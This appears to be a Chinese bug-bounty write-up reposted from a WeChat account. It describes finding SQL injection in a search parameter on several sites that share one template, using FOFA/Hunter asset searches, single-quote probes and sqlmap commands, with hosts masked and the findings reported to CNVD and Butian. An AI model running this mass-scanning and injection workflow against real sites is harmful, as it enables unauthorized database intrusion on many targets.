从一次事件到通杀漏洞挖掘
某天风和日丽,宜挖洞,打开FOFA直接干,翻了很久看到了这个站点,于是牵引出以下故事
body="系统" && country="CN"能打的资产贼多吧然后去偶遇,看到功能点都随手测一下
随便翻翻看 先看这个站点有哪些功能点
一眼看到搜索框 就试了试注入,害 加了个’还真报错了挖洞9分运气 这肯定有注入了嘛,注入不会 没事 有SQLmap和超级SQL
http://xxx.xx.xxx.xxx/search/?key=1%27
之后扔到sqlmap梭哈
python3 sqlmap.py -u http://xxx.xx.xxx.xxx/search/?key=1 --random-agent --batch
交完cnvd之后就想会不会有这套模板同样特征的漏洞呢
于是翻网页源代码
拿到hunter去看资产贼多
Ok通杀到手,但资产不满足5000w于是交了补天
然后漏洞复现互联网案例十例复现三案例十
1、http://www.xxxxxx.cn/search/index.html?key=1
https://www.xxxxxx.cn/search/index.html?key=1%27
判断有注入,然后sqlmap一把梭
python3 sqlmap.py -u https://www.xxx.cn/search/index.html?key=1 --random-agent --batch
2、https://www.xxxxxx.com/search/?key=1
https://www.xxxxxx.com/search/?key=1%27
还是扔进sqlmap梭哈
python3 sqlmap.py -u https://www.xxxxxx.com/search/?key=1 --random-agent --batch
3、http://www.xxxxxx.cn/search/?key=1
https://www.xxxxxx.cn/search/?key=1%27
Sqlmap梭哈
python3 sqlmap.py -u https://www.xxxxxx.cn/search/?key=1 --random-agent --batch
关注及时推送最新安全威胁资讯!
原文始发于微信公众号(Gaobai文库):src漏洞挖掘 从一次事件到通杀漏洞挖掘
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论